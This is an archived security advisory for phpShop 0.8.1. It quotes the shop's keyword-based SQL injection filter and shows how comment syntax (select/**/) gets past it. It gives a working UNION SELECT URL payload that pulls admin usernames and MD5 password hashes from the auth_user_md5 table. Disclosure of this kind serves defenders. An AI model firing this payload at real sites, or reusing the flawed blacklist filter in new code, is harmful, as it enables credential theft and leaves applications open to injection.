TUCoPS :: Web :: PHP :: bx1712.htm

phpShop <= v 0.8.1 Remote SQL injection / Filter Bypass
phpShop <= v 0.8.1 Remote SQL injection / Filter Bypass
phpShop <= v 0.8.1 Remote SQL injection / Filter Bypass



Vendor  : PHPShop=0D
Webiste : http://www.phpshop.org=0D 
Version : v0.8.1=0D
Author: the redc0ders / theredc0ders[at]gmail[dot]com=0D
Condition: magic_quote_gpc = off , in php.ini setting=0D
=0D
Details :=0D
===========0D
=0D
  Vulnerable Code in index.php near lines 98 - 128=0D
   [code]=0D
 // basic SQL inject detection=0D
   $my_insecure_array = array('keyword' => $_REQUEST['keyword'],=0D
                  'category_id' => $_REQUEST['category_id'],=0D
                  'product_id' => $_REQUEST['product_id'],=0D
                  'user_id' => $_REQUEST['user_id'],=0D
                  'user_info_id' => $_REQUEST['user_info_id'],=0D
                  'page' => $_REQUEST['page'],=0D
                  'func' => $_REQUEST['func']);=0D
                  =0D
   while(list($key,$value)=each($my_insecure_array)) {=0D
      if (stristr($value,'FROM ') ||=0D
          stristr($value,'UPDATE ') ||=0D
          stristr($value,'WHERE ') ||=0D
          stristr($value,'ALTER ')  ||=0D
          stristr($value,'SELECT ')  ||=0D
          stristr($value,'SHUTDOWN ') ||=0D
          stristr($value,'CREATE ') ||=0D
          stristr($value,'DROP ') ||=0D
          stristr($value,'DELETE FROM') ||=0D
          stristr($value,'script') ||=0D
          stristr($value,'<>') ||=0D
          stristr($value,'=') ||=0D
          stristr($value,'SET '))=0D
              die('Please provide a permitted value for '.$key);=0D
   }=0D
 [/code]=0D
=0D
  The script check if $my_insecure_array contain 'SELECT ','UPDATE ' ...etc =0D
=0D
  so WORD+space, and this can be easily bypassed using comments like =0D
  POC : select/**/input1,input2...=0D
=0D
Exemple to inject admin username and md5 hash password : http://website/phpshop/?page=shop/flypage&product_id=-3'+UNION+select/**/null,null,null,null,null,password,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,username/**/from/**/auth_user_md5/*=0D 
=0D
=0D
  =0D
  Solution :=0D
 simply remove spaces in stristr() function or activate magic_quotes_gpc in php.ini=0D
 =0D
 Greetz : Hacker1 - ToXiC350 - S4MI - Miyyet - Pynsso - Amigo_BM and All Moroccan Hackers =)=0D
=0D
>From Morocco : JIB L3EZZ WELLA K7AZZ !

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH